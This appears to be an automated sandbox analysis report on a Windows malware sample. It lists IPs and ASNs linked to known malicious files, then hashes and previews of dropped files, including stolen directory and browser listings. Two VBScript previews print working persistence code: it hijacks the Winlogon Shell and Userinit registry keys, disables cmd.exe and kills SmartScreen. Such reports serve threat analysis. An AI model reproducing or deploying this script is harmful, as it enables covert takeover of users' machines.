                                                                                      IpEmBW3Qw5.rtfGet hashmaliciousUnknownBrowse
                                                                                      • 185.199.109.133
                                                                                      file.exeGet hashmaliciousUnknownBrowse
                                                                                      • 185.199.110.133
                                                                                      Bootstrapper V1.19.exeGet hashmaliciousPython Stealer, Empyrean, Discord Token StealerBrowse
                                                                                      • 185.199.111.133
                                                                                      DHL Shipment Doc's.xlsGet hashmaliciousRemcosBrowse
                                                                                      • 185.199.111.133
                                                                                      GEJMING DUO USD 20241002144902.docx.docGet hashmaliciousRemcosBrowse
                                                                                      • 185.199.108.133
                                                                                      Swift Copy.xlsGet hashmaliciousUnknownBrowse
                                                                                      • 185.199.110.133
                                                                                      SWIFT 103 202406111301435660 110624-pdf.vbsGet hashmaliciousRemcosBrowse
                                                                                      • 185.199.110.133
                                                                                      github.comstubInf.exeGet hashmaliciousXmrigBrowse
                                                                                      • 140.82.121.3
                                                                                      launcher.exeGet hashmaliciousUnknownBrowse
                                                                                      • 140.82.121.3
                                                                                      launcher.exeGet hashmaliciousUnknownBrowse
                                                                                      • 140.82.121.4
                                                                                      Windows PowerShell.lnkGet hashmaliciousUnknownBrowse
                                                                                      • 140.82.121.4
                                                                                      Request For Quotation.jsGet hashmaliciousSTRRATBrowse
                                                                                      • 140.82.121.4
                                                                                      8QBpLkbY6i.exeGet hashmaliciousWhiteSnake StealerBrowse
                                                                                      • 140.82.121.4
                                                                                      https://jhansalazar.weebly.com/Get hashmaliciousUnknownBrowse
                                                                                      • 140.82.121.6
                                                                                      http://ogp.me/ns#Get hashmaliciousUnknownBrowse
                                                                                      • 185.199.108.154
                                                                                      URGENT PAYMENT REQUEST.jsGet hashmaliciousSTRRATBrowse
                                                                                      • 140.82.121.4
                                                                                      3wtD2jXnxy.exeGet hashmaliciousRedLine, STRRATBrowse
                                                                                      • 140.82.121.4

                                                                                      ASNs

                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                      COGECO-PEER1CAyakov.mips.elfGet hashmaliciousMiraiBrowse
                                                                                      • 66.40.89.95
                                                                                      http://activa1dina.w3spaces.com/Get hashmaliciousUnknownBrowse
                                                                                      • 69.90.254.78
                                                                                      https://is.gd/fxcRirGet hashmaliciousUnknownBrowse
                                                                                      • 69.90.254.78
                                                                                      https://cancelar-plan-pr0teccion1.w3spaces.com/Get hashmaliciousUnknownBrowse
                                                                                      • 69.90.254.78
                                                                                      https://0610ddce8f18f5a435e0067c7ddb3ec6.pages.dev/Get hashmaliciousHTMLPhisherBrowse
                                                                                      • 162.254.39.141
                                                                                      http://dev-265334124785.pantheonsite.io/Get hashmaliciousUnknownBrowse
                                                                                      • 66.155.40.24
                                                                                      http://dev-gdtf.pantheonsite.io/Get hashmaliciousUnknownBrowse
                                                                                      • 66.155.40.24
                                                                                      http://www.rb.gy/onu2r0/Get hashmaliciousUnknownBrowse
                                                                                      • 66.155.40.24
                                                                                      http://www.rb.gy/v99361/Get hashmaliciousUnknownBrowse
                                                                                      • 66.155.40.24
                                                                                      http://www.rb.gy/yfdl7y/Get hashmaliciousUnknownBrowse
                                                                                      • 66.155.40.24
                                                                                      FASTLYUSstubInf.exeGet hashmaliciousXmrigBrowse
                                                                                      • 185.199.110.133
                                                                                      MKWbWHd5Ni.rtfGet hashmaliciousRemcosBrowse
                                                                                      • 185.199.111.133
                                                                                      DSpWOKW7zn.rtfGet hashmaliciousRemcosBrowse
                                                                                      • 185.199.109.133
                                                                                      Windows PowerShell.lnkGet hashmaliciousUnknownBrowse
                                                                                      • 185.199.111.133
                                                                                      IpEmBW3Qw5.rtfGet hashmaliciousUnknownBrowse
                                                                                      • 185.199.109.133
                                                                                      Request For Quotation.jsGet hashmaliciousSTRRATBrowse
                                                                                      • 199.232.196.209
                                                                                      bomb.exeGet hashmaliciousAmadey, Go Injector, LummaC Stealer, Phorpiex, PureLog Stealer, Stealc, VidarBrowse
                                                                                      • 151.101.2.49
                                                                                      8QBpLkbY6i.exeGet hashmaliciousWhiteSnake StealerBrowse
                                                                                      • 185.199.110.133
                                                                                      https://cedars-sinai-enterprise.dicomgrid.com/worklist/Get hashmaliciousUnknownBrowse
                                                                                      • 151.101.129.140
                                                                                      [MALICIOUS]_Secured_Doc-[yBv-26104].pdfGet hashmaliciousUnknownBrowse
                                                                                      • 151.101.2.137
                                                                                      GITHUBUSstubInf.exeGet hashmaliciousXmrigBrowse
                                                                                      • 140.82.121.3
                                                                                      launcher.exeGet hashmaliciousUnknownBrowse
                                                                                      • 140.82.121.3
                                                                                      launcher.exeGet hashmaliciousUnknownBrowse
                                                                                      • 140.82.121.4
                                                                                      Windows PowerShell.lnkGet hashmaliciousUnknownBrowse
                                                                                      • 140.82.121.4
                                                                                      Request For Quotation.jsGet hashmaliciousSTRRATBrowse
                                                                                      • 140.82.121.4
                                                                                      8QBpLkbY6i.exeGet hashmaliciousWhiteSnake StealerBrowse
                                                                                      • 140.82.121.4
                                                                                      https://jhansalazar.weebly.com/Get hashmaliciousUnknownBrowse
                                                                                      • 140.82.121.6
                                                                                      http://ogp.me/ns#Get hashmaliciousUnknownBrowse
                                                                                      • 140.82.114.17
                                                                                      URGENT PAYMENT REQUEST.jsGet hashmaliciousSTRRATBrowse
                                                                                      • 140.82.121.4
                                                                                      3wtD2jXnxy.exeGet hashmaliciousRedLine, STRRATBrowse
                                                                                      • 140.82.121.4

                                                                                      JA3 Fingerprints

                                                                                      No context

                                                                                      Dropped Files

                                                                                      No context

                                                                                      Created / dropped Files

                                                                                      C:\Disk.flv.exe

                                                                                      Download File
                                                                                      Process:C:\Users\user\AppData\Local\Temp\taskmen.exe
                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):1006080
                                                                                      Entropy (8bit):7.86899484111889
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:+4yj0Z3aVJn8XkCd8Vm/43luAOagSkkbkMaABXWQ8rzMnZ7rZ2HX/vq9fELsDq7g:+4yj0Z3GJhYwlurxSH6QnZxneLS2WF
                                                                                      MD5:EFA5846830C8A002235AC1768295C1B9
                                                                                      SHA1:9822CB1A27AC6B7B74653619E1134EC7817A0959
                                                                                      SHA-256:3E9933AF0D5EA0F16393BFFC0D6E3EE95E7F5B84064F29BEDEB8F01D0B89E349
                                                                                      SHA-512:A2009A97D28C7BA9B39C2BA196C3A97A66E56458D34E9C39EB2ADB00C246C41849B74EAF9E1DD2CDEB01DCE64AC00BB13FA560185BE41EF0602F9F922DF87DF6
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                      Reputation:unknown
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...X_h..........."...0.................. ........@.. ....................... #...........`....................................(.....".......................#......................................................................!.H............text...T.... ...................... ..`.BYK................................ ..`.7'g................................@....{a".....8.......:.................. ..`.rsrc........."......@..............@..@.reloc........#......X..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Program Files (x86)\win.dll

                                                                                      Download File
                                                                                      Process:C:\Users\user\AppData\Local\Temp\taskmen.exe
                                                                                      File Type:Unicode text, UTF-8 text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):6
                                                                                      Entropy (8bit):2.251629167387823
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:N:N
                                                                                      MD5:EC1DA0AD6A68916C0F65270060CC3806
                                                                                      SHA1:944498D003A207D91C61E332D12BE62F89D1CC05
                                                                                      SHA-256:D6C897090622428152C6D312210531357519315F6FDB09ACD9F4F27531A6E946
                                                                                      SHA-512:BE88B94F7978D5E00718A30F5BF3EE262F0F1C1F1C5B1208BB0E646649C90E02D49F9CC054F8936C77C3A90A2935E98FBCA3E571ED466C7E4619D51CA903409D
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:...

                                                                                      C:\Program Files\win.dll

                                                                                      Download File
                                                                                      Process:C:\Users\user\AppData\Local\Temp\taskmen.exe
                                                                                      File Type:Unicode text, UTF-8 text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):6
                                                                                      Entropy (8bit):2.251629167387823
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:N:N
                                                                                      MD5:EC1DA0AD6A68916C0F65270060CC3806
                                                                                      SHA1:944498D003A207D91C61E332D12BE62F89D1CC05
                                                                                      SHA-256:D6C897090622428152C6D312210531357519315F6FDB09ACD9F4F27531A6E946
                                                                                      SHA-512:BE88B94F7978D5E00718A30F5BF3EE262F0F1C1F1C5B1208BB0E646649C90E02D49F9CC054F8936C77C3A90A2935E98FBCA3E571ED466C7E4619D51CA903409D
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:...

                                                                                      C:\ProgramData\Synaptics\taskmen.exe

                                                                                      Download File
                                                                                      Process:C:\Users\user\AppData\Local\Temp\taskmen.exe
                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):1006080
                                                                                      Entropy (8bit):7.86899484111889
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:+4yj0Z3aVJn8XkCd8Vm/43luAOagSkkbkMaABXWQ8rzMnZ7rZ2HX/vq9fELsDq7g:+4yj0Z3GJhYwlurxSH6QnZxneLS2WF
                                                                                      MD5:EFA5846830C8A002235AC1768295C1B9
                                                                                      SHA1:9822CB1A27AC6B7B74653619E1134EC7817A0959
                                                                                      SHA-256:3E9933AF0D5EA0F16393BFFC0D6E3EE95E7F5B84064F29BEDEB8F01D0B89E349
                                                                                      SHA-512:A2009A97D28C7BA9B39C2BA196C3A97A66E56458D34E9C39EB2ADB00C246C41849B74EAF9E1DD2CDEB01DCE64AC00BB13FA560185BE41EF0602F9F922DF87DF6
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                      Reputation:unknown
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...X_h..........."...0.................. ........@.. ....................... #...........`....................................(.....".......................#......................................................................!.H............text...T.... ...................... ..`.BYK................................ ..`.7'g................................@....{a".....8.......:.................. ..`.rsrc........."......@..............@..@.reloc........#......X..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\ProgramData\izjuqhimv.vbs

                                                                                      Download File
                                                                                      Process:C:\Users\user\AppData\Roaming\taskmoder.exe
                                                                                      File Type:Unicode text, UTF-8 text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):727
                                                                                      Entropy (8bit):5.468685129441501
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:KqahMcOVx9nWV2/+GSZKl7x6McOVxfV2/+GSZKiz9x6aD/aL4I/w8WGJyxqQq5K5:Kqa699nWV2MZKfh9fV2MZKCpg4yWGJCB
                                                                                      MD5:33B1F09209870C4DDC5E12A0202AFAD3
                                                                                      SHA1:E094BC1C427B86C80D194EEC77C90FCA93A67F3E
                                                                                      SHA-256:E0FDEA1D48D9401A20AB52C769F75EC3658FBFC33192CC88C68E53F737007435
                                                                                      SHA-512:81DC09CD80237F230CCF7F6DCD97DA7F064F427D842D7CFAAC2DD147501B0826086E20104634E870C9B408BF461E40206B3B3904A1E7612D6D9B0B2581C47D06
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:Set objShell = CreateObject("WScript.Shell")....' ........ ........ ......... Shell..objShell.RegWrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell", "explorer.exe,C:/Windows/taskmen.exe"....' ........ ........ ......... Userinit..objShell.RegWrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit", "C:\Windows\system32\userinit.exe,C:/Windows/taskmen.exe"....' ......... cmd.exe ..... ........objShell.RegWrite "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment\ComSpec", ""....' ............. explorer.exe..objShell.Run "taskkill /f /im smartscreen.exe"..objShell.Run "userinit.exe"..

                                                                                      C:\ProgramData\win.dll

                                                                                      Download File
                                                                                      Process:C:\Users\user\AppData\Local\Temp\taskmen.exe
                                                                                      File Type:Unicode text, UTF-8 text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):6
                                                                                      Entropy (8bit):2.251629167387823
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:N:N
                                                                                      MD5:EC1DA0AD6A68916C0F65270060CC3806
                                                                                      SHA1:944498D003A207D91C61E332D12BE62F89D1CC05
                                                                                      SHA-256:D6C897090622428152C6D312210531357519315F6FDB09ACD9F4F27531A6E946
                                                                                      SHA-512:BE88B94F7978D5E00718A30F5BF3EE262F0F1C1F1C5B1208BB0E646649C90E02D49F9CC054F8936C77C3A90A2935E98FBCA3E571ED466C7E4619D51CA903409D
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:...

                                                                                      C:\ProgramData\winlog.vbs

                                                                                      Download File
                                                                                      Process:C:\Users\user\AppData\Roaming\taskmoder.exe
                                                                                      File Type:Unicode text, UTF-8 text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):729
                                                                                      Entropy (8bit):5.454988098280428
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:KqahMcOVx9nWV2/+GSZKl7cMcOVxfV2/+GSZKiz9caD/aL4I/w8WGJyxqQq5KSIo:Kqa699nWV2MZKp9fV2MZKYg4yWGJCqD9
                                                                                      MD5:ADF228055C3FDCED02BE03CEA4C75994
                                                                                      SHA1:94531F015CC374C54AE324DBE93C31D1139BDA08
                                                                                      SHA-256:F2B0AA797907E41441E0FDD2C98FD95EF9EB8CCB9760273F9D84B5690B0D6C6C
                                                                                      SHA-512:F6B0BB73E29911355C2E4ABBB4696E49266509B0CAE67482AFC2C2DA2F6C5506558FA620F3A100300C2BAC7CC59343FD78292A584877A7396B253B231A241D0D
                                                                                      Malicious:true
                                                                                      Reputation:unknown
                                                                                      Preview:Set objShell = CreateObject("WScript.Shell")....' ........ ........ ......... Shell..objShell.RegWrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell", "explorer.exe,C:\Windows\taskmen.exe"....' ........ ........ ......... Userinit..objShell.RegWrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit", "C:\Windows\system32\userinit.exe,C:\Windows\taskmen.exe"....' ......... cmd.exe ..... ........objShell.RegWrite "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment\ComSpec", ""....' ............. explorer.exe..objShell.Run "taskkill /f /im smartscreen.exe"..objShell.Run "userinit.exe"....

                                                                                      C:\Users\user\AppData\Local\58c563c610509c75e34df9ae09413e8e\user@238576_en-US\Browsers\Firefox\Bookmarks.txt

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text
                                                                                      Category:dropped
                                                                                      Size (bytes):105
                                                                                      Entropy (8bit):3.8863455911790052
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:RGtjybXLGSWK+ZjMGvRS3ZMz9GSOLj2SjyRE2qJ:hvWF7Ipg9OL2RE2m
                                                                                      MD5:2E9D094DDA5CDC3CE6519F75943A4FF4
                                                                                      SHA1:5D989B4AC8B699781681FE75ED9EF98191A5096C
                                                                                      SHA-256:C84C98BBF5E0EF9C8D0708B5D60C5BB656B7D6BE5135D7F7A8D25557E08CF142
                                                                                      SHA-512:D1F7EED00959E902BDB2125B91721460D3FF99F3BDFC1F2A343D4F58E8D4E5E5A06C0C6CDC0379211C94510F7C00D7A8B34FA7D0CA0C3D54CBBE878F1E9812B7
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:### Get Help ###.### Customize Firefox ###.### Get Involved ###.### About Us ###.### Getting Started ###.

                                                                                      C:\Users\user\AppData\Local\58c563c610509c75e34df9ae09413e8e\user@238576_en-US\Browsers\Firefox\History.txt

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:Unicode text, UTF-8 text
                                                                                      Category:dropped
                                                                                      Size (bytes):94
                                                                                      Entropy (8bit):4.886397362842801
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:RGEnGPHA9lfMJJEFAN2DSLvIJiMhKVX3L2WdXuvn:DG/CF0EFAN2OLciA8d+v
                                                                                      MD5:61CDD7492189720D58F6C5C975D6DFBD
                                                                                      SHA1:6966AFE0DEC5B0ABD90291FA12C0F6B7EF73ED43
                                                                                      SHA-256:2F345865397FF1952921DB0588A6B589BAF30E67A90E11F7064E515AC162E862
                                                                                      SHA-512:20D5A1C9809DF4F5B9C789042E5B88928A5246F9EB44F9D265CA3AA6FC9544A582B758ECAF6BBB0E9CEE149BD0AAC5E6C63D954541D1B23A7FC11894121CC0AE
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:### Firefox Privacy Notice . Mozilla ### (https://www.mozilla.org/en-US/privacy/firefox/) 1.

                                                                                      C:\Users\user\AppData\Local\58c563c610509c75e34df9ae09413e8e\user@238576_en-US\Directories\Desktop.txt

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1086
                                                                                      Entropy (8bit):5.242255871905457
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:0FDD5oGcz8A/+fh8bZH5xmN3omJy/npPrc/HVV4Blb:0h+Gc3S6ZH5g2mWnpPrc/Hb4Blb
                                                                                      MD5:22E92C703800350D845FC95FF482F6C8
                                                                                      SHA1:A5E6B7E36AE9249ABE8564A4032CD73EF0BD3DEF
                                                                                      SHA-256:822854CCC002F2C53B2B622DE38D48023957ED0F65279DBDCEBA5EAB4D784717
                                                                                      SHA-512:A63AF54E08199252ED979FBD8E74DF632714A480D9D2E33CCDF1CC2B1E3CA0CACF929508825377CE229CBDD7656AE4F7917D23ED519D33DFB3C2EC5B13BABD19
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:Desktop\...BJZFPPWAPT\....BJZFPPWAPT.docx....GLTYDMDUST.png....HMPPSXQPQV.mp3....KLIZUSIQEN.pdf....NYMMPCEIMA.jpg....ZGGKNSUKOP.xlsx...EFOYFBOLXA\....BJZFPPWAPT.xlsx....DUUDTUBZFW.pdf....EFOYFBOLXA.docx....EWZCVGNOWT.png....KLIZUSIQEN.mp3....ZGGKNSUKOP.jpg...EOWRVPQCCS\...GRXZDKKVDB\....DUUDTUBZFW.xlsx....EIVQSAOTAQ.pdf....GRXZDKKVDB.docx....KLIZUSIQEN.jpg....NWCXBPIUYI.mp3....QCOILOQIKC.png...HMPPSXQPQV\...JDDHMPCDUJ\...LHEPQPGEWF\...NVWZAPQSQL\....BJZFPPWAPT.jpg....DUUDTUBZFW.mp3....EFOYFBOLXA.xlsx....GRXZDKKVDB.pdf....NVWZAPQSQL.docx....PALRGUCVEH.png...NYMMPCEIMA\...QFAPOWPAFG\...UNKRLCVOHV\...ZGGKNSUKOP\...BJZFPPWAPT.docx...BJZFPPWAPT.jpg...BJZFPPWAPT.xlsx...desktop.ini...DUUDTUBZFW.mp3...DUUDTUBZFW.pdf...DUUDTUBZFW.xlsx...EFOYFBOLXA.docx...EFOYFBOLXA.xlsx...EIVQSAOTAQ.pdf...EWZCVGNOWT.png...Excel.lnk...GLTYDMDUST.png...GRXZDKKVDB.docx...GRXZDKKVDB.pdf...HMPPSXQPQV.mp3...KLIZUSIQEN.jpg...KLIZUSIQEN.mp3...KLIZUSIQEN.pdf...NVWZAPQSQL.docx...NWCXBPIUYI.mp3...NYMMPCEIMA.jpg...PALRGUCV

                                                                                      C:\Users\user\AppData\Local\58c563c610509c75e34df9ae09413e8e\user@238576_en-US\Directories\Documents.txt

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1202
                                                                                      Entropy (8bit):5.340219371082373
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:OFDD5oGcz8A/+f8xrqEEM8bZH5xmN3omJy/5c/HVolb:Oh+Gc3hBqEEM6ZH5g2mW5c/Hylb
                                                                                      MD5:8EEAD3774E0CB8242A543F1BFBC4D7AF
                                                                                      SHA1:1C08E7D014DE3C9920A86DC35B24A4B77492E379
                                                                                      SHA-256:4C0470A4978084C9DFC00E4734B328B85C6E1E6E76C0766CF135366979C653C8
                                                                                      SHA-512:2D55F622EEFFFE7BE6008F96E0930C51E49B15AF54BB5C00B66D47125285DA75D5EC85F43669A8398AE3AC58A311D2D6163414A0E337EB12A7A76174BBEA7E24
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:Documents\...BJZFPPWAPT\....BJZFPPWAPT.docx....GLTYDMDUST.png....HMPPSXQPQV.mp3....KLIZUSIQEN.pdf....NYMMPCEIMA.jpg....ZGGKNSUKOP.xlsx...EFOYFBOLXA\....BJZFPPWAPT.xlsx....DUUDTUBZFW.pdf....EFOYFBOLXA.docx....EWZCVGNOWT.png....KLIZUSIQEN.mp3....ZGGKNSUKOP.jpg...EOWRVPQCCS\...GRXZDKKVDB\....DUUDTUBZFW.xlsx....EIVQSAOTAQ.pdf....GRXZDKKVDB.docx....KLIZUSIQEN.jpg....NWCXBPIUYI.mp3....QCOILOQIKC.png...HMPPSXQPQV\...JDDHMPCDUJ\...LHEPQPGEWF\...My Music\....desktop.ini...My Pictures\....Camera Roll\.....desktop.ini....Saved Pictures\.....desktop.ini....desktop.ini...My Videos\....desktop.ini...NVWZAPQSQL\....BJZFPPWAPT.jpg....DUUDTUBZFW.mp3....EFOYFBOLXA.xlsx....GRXZDKKVDB.pdf....NVWZAPQSQL.docx....PALRGUCVEH.png...NYMMPCEIMA\...QFAPOWPAFG\...UNKRLCVOHV\...ZGGKNSUKOP\...BJZFPPWAPT.docx...BJZFPPWAPT.jpg...BJZFPPWAPT.xlsx...desktop.ini...DUUDTUBZFW.mp3...DUUDTUBZFW.pdf...DUUDTUBZFW.xlsx...EFOYFBOLXA.docx...EFOYFBOLXA.xlsx...EIVQSAOTAQ.pdf...EWZCVGNOWT.png...GLTYDMDUST.png...GRXZDKKVDB.docx...GRX

                                                                                      C:\Users\user\AppData\Local\58c563c610509c75e34df9ae09413e8e\user@238576_en-US\Directories\Downloads.txt

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):442
                                                                                      Entropy (8bit):5.262639304915439
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:ajltCbiHLKpjvTjomVjKdquV/5cysa+ssMdaqjlb:aDxmN3omJy/5c/HVolb
                                                                                      MD5:D65BF90C9173E5C53B958F8006B425D6
                                                                                      SHA1:685367FF389C6BFB89591A6109326B3C02151B78
                                                                                      SHA-256:E8CADC8190D6B99D06A9A0F4F14B8456C3ADBF2C31D3D721E68088C41604CFCC
                                                                                      SHA-512:49D994A2B83A3532A43A0C023E283B23C11988C4F61097C29CA9D9AEAD2BC41FB17F40E336BBCC929F229580C1C8A495E1818D7083E4E4345C60BAF5533AA666
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:Downloads\...BJZFPPWAPT.docx...BJZFPPWAPT.jpg...BJZFPPWAPT.xlsx...desktop.ini...DUUDTUBZFW.mp3...DUUDTUBZFW.pdf...DUUDTUBZFW.xlsx...EFOYFBOLXA.docx...EFOYFBOLXA.xlsx...EIVQSAOTAQ.pdf...EWZCVGNOWT.png...GLTYDMDUST.png...GRXZDKKVDB.docx...GRXZDKKVDB.pdf...HMPPSXQPQV.mp3...KLIZUSIQEN.jpg...KLIZUSIQEN.mp3...KLIZUSIQEN.pdf...NVWZAPQSQL.docx...NWCXBPIUYI.mp3...NYMMPCEIMA.jpg...PALRGUCVEH.png...QCOILOQIKC.png...ZGGKNSUKOP.jpg...ZGGKNSUKOP.xlsx..

                                                                                      C:\Users\user\AppData\Local\58c563c610509c75e34df9ae09413e8e\user@238576_en-US\Directories\OneDrive.txt

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):25
                                                                                      Entropy (8bit):4.023465189601646
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:1hiR8LKB:14R8LKB
                                                                                      MD5:966247EB3EE749E21597D73C4176BD52
                                                                                      SHA1:1E9E63C2872CEF8F015D4B888EB9F81B00A35C79
                                                                                      SHA-256:8DDFC481B1B6AE30815ECCE8A73755862F24B3BB7FDEBDBF099E037D53EB082E
                                                                                      SHA-512:BD30AEC68C070E86E3DEC787ED26DD3D6B7D33D83E43CB2D50F9E2CFF779FEE4C96AFBBE170443BD62874073A844BEB29A69B10C72C54D7D444A8D86CFD7B5AA
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:OneDrive\...desktop.ini..

                                                                                      C:\Users\user\AppData\Local\58c563c610509c75e34df9ae09413e8e\user@238576_en-US\Directories\Pictures.txt

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):88
                                                                                      Entropy (8bit):4.450045114302317
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:YzIVqIPLKmwHW8LKKrLKB:nqyLKmYNLKCLKB
                                                                                      MD5:D430E8A326E3D75F5E49C40C111646E7
                                                                                      SHA1:D8F2494185D04AB9954CD78268E65410768F6226
                                                                                      SHA-256:22A45B5ECD9B66441AE7A7AB161C280B6606F920A6A6C25CD7B9C2D4CEB3254D
                                                                                      SHA-512:1E8139844D02A3009EE89E2DC33CF9ED79E988867974B1291ABA8BC26C30CB952F10E88E0F44A4AEEE162A27E71EAA331CF8AC982B4179DC8203F6F7280BA5AE
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:Pictures\...Camera Roll\....desktop.ini...Saved Pictures\....desktop.ini...desktop.ini..

                                                                                      C:\Users\user\AppData\Local\58c563c610509c75e34df9ae09413e8e\user@238576_en-US\Directories\Startup.txt

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):24
                                                                                      Entropy (8bit):4.053508854797679
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:jgBLKB:j4LKB
                                                                                      MD5:68C93DA4981D591704CEA7B71CEBFB97
                                                                                      SHA1:FD0F8D97463CD33892CC828B4AD04E03FC014FA6
                                                                                      SHA-256:889ED51F9C16A4B989BDA57957D3E132B1A9C117EE84E208207F2FA208A59483
                                                                                      SHA-512:63455C726B55F2D4DE87147A75FF04F2DAA35278183969CCF185D23707840DD84363BEC20D4E8C56252196CE555001CA0E61B3F4887D27577081FDEF9E946402
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:Startup\...desktop.ini..

                                                                                      C:\Users\user\AppData\Local\58c563c610509c75e34df9ae09413e8e\user@238576_en-US\Directories\Temp.txt

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):4408
                                                                                      Entropy (8bit):5.174348482354017
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:4tiCKcwGT+jDM9Zw72fSASbSbdbsuEMnI0kjMC1GA0oMjL02WUw1Ltjg/uZ9PuGS:LYfa2fSASOpgu9nI0kjMC1GA0hf0X3xK
                                                                                      MD5:176696164347B9E15E8E2F996EF86A6F
                                                                                      SHA1:4BAD0E0763DC8F50FAD8EBD682FDD4660CA82E80
                                                                                      SHA-256:ED93601365F0694DD097DA7D3A2EEBDBB5BFAB19EF758B4CEDCCE2A94B4EFFAB
                                                                                      SHA-512:12B10F26C1A634AA9732C33B1DE660F21F89846A68F6B1D76F0B75A834981C8A91A637FE3020147E5357AFCD67830BEA9568E8CD45A10062772F3CF9373477B6
                                                                                      Malicious:false
                                                                                      Reputation:unknown
